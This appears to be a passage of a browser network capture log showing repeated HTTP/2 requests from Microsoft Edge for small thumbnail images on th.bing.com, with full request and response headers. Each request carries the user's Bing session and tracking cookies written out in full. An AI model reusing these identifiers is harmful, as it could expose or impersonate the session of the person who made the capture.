cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6949
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f435c
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.65b8d4f6-e7ef-4427-ad51-031394a8dc01&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.65b8d4f6-e7ef-4427-ad51-031394a8dc01&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3511
cache-control: public, max-age=5183958
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4357
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.d4ff6746-f850-4f6f-abb3-e2e09b2349a8&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.d4ff6746-f850-4f6f-abb3-e2e09b2349a8&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5132
cache-control: public, max-age=5183945
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f435e
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.IsRnev_WQ6d0GHyWRL00cgHaEL&w=80&h=80&c=1&vt=9&bgcl=fdfaee&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.IsRnev_WQ6d0GHyWRL00cgHaEL&w=80&h=80&c=1&vt=9&bgcl=fdfaee&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2994
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f435b
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.d4ff6746-f850-4f6f-abb3-e2e09b2349a8&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.d4ff6746-f850-4f6f-abb3-e2e09b2349a8&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8267
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f435d
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.a594b45fbe839bed9684db302811a1cb&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.a594b45fbe839bed9684db302811a1cb&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3485
cache-control: public, max-age=5183967
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4358
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.5495379a5aea25e454828cef77f4df98&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.5495379a5aea25e454828cef77f4df98&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7590
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4356
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.6f640341b757116f812463887ac2026f&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.6f640341b757116f812463887ac2026f&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4249
cache-control: public, max-age=5183962
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4354
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.669cc86d9e9277997ac6c795a129bdf0&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.669cc86d9e9277997ac6c795a129bdf0&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7701
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4351
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.8d3733568bf8db9e45e1ce65c56cbad8&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.8d3733568bf8db9e45e1ce65c56cbad8&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
